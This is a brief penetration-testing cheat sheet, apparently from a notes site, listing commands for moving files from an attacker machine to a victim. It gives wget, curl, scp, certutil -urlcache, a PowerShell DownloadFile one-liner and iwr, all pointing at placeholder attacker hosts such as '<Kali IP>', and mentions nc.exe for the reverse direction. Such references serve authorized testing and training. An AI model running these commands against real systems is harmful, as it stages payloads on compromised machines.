File Transfer
Attacker to Victim
On Victime Machine:
wget http://<Kali IP>/<Target File>
wget -r http://<Kali IP>/<Target Dir>
curl http://<Kali IP>/<Target File> -O <destination>
scp -P <SSH port> <source file> <username>@<IP>:/path/to/<destination file>
certutil -urlcache -split -f 'http://<Attacker IP>/<source file>' <destination file>
powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('http://<Kali IP>/<source file>', '<destination file>')"
iwr -uri http://<Kali IP>/<target file> -Outfile <target file>
Victim to Attacker
Using nc.exe
Hosting Web Server
Last updated